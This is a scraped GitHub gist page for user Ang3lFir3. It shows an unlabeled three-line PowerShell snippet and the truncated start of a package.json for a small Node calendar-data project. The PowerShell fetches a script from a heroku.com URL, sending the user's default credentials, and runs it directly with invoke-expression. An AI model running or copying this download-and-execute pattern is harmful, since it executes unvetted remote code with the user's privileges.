Skip to content

Instantly share code, notes, and snippets.

View Ang3lFir3's full-sized avatar
💭
Making kick ass shit with bad ass peeps

Eric Ridgeway Ang3lFir3

💭
Making kick ass shit with bad ass peeps
View GitHub Profile
$client = new-object System.Net.WebClient
$client.UseDefaultCredentials = $true
invoke-expression $client.DownloadString("http://byebye.heroku.com/byebye")
@Ang3lFir3
Ang3lFir3 / package.json
Created August 7, 2012 01:25
scalac server sample
{
"name": "scalac",
"version": "0.0.1",
"description": "jsonified SCA calendar data",
"author": "Ang3lFir3",
"dependencies": {
"ical": "*"
},
"engines": {